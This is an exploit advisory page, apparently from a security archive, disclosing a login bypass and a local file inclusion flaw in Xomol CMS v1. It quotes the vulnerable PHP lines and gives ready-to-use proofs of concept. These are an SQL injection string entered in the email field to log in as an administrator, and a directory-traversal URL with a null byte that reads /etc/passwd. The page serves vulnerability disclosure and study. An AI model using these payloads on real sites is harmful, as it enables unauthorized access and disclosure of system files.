exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xomol-bypasslfi.txt

xomol-bypasslfi.txt
Posted May 27, 2008
Authored by DNX

Xomol CMS version 1 suffers from login bypass and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, bypass, file inclusion
SHA-256 | 4c94d3033eb7747499160f24a5c38f4d2b9fe39cd2ec6f662c9b4cb7d341a640

xomol-bypasslfi.txt

Change Mirror Download
                     \#'#/
(-.-)
-------------oOO---(_)---OOo------------
| Xomol CMS v1 Login Bypass & LFI |
| coded by DNX |
----------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.xomol.net
[!] Detected...: 12.05.2008
[!] Reported...: 13.05.2008 (didn't work: host mail.xomol.net said: 554 5.7.1 - Relay access denied)
[!] Response...: xx.xx.2008

[!] Background.: Xomol CMS is a content management system based on PHP and MySQL

[!] Bug Bypass.: $_POST['email'] and $_POST['password'] in index.php near line 59

58: if(!empty($_POST['email'])&&!empty($_POST['password'])){
59: $sql='SELECT user_id FROM users WHERE user_email="'.$_POST['email'].'" AND user_password="'.md5($_POST['password']).'" AND user_status=1';
60: $result = sql_query($sql, $dbi);

[!] Bug LFI....: $op in index.php near line 272

234: switch($op){

270: default:
271: if (file_exists('modules/'.$op.'/index.php')) {
272: include('modules/'.$op.'/index.php');

[!] PoC Bypass.: Login with email: " OR user_group=1/*"" and password: not empty
(works only with magic_quotes_gpc = off)

[!] PoC LFI....: http://127.0.0.1/xomol/index.php?op=../../../../../../../../../../etc/passwd%00

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close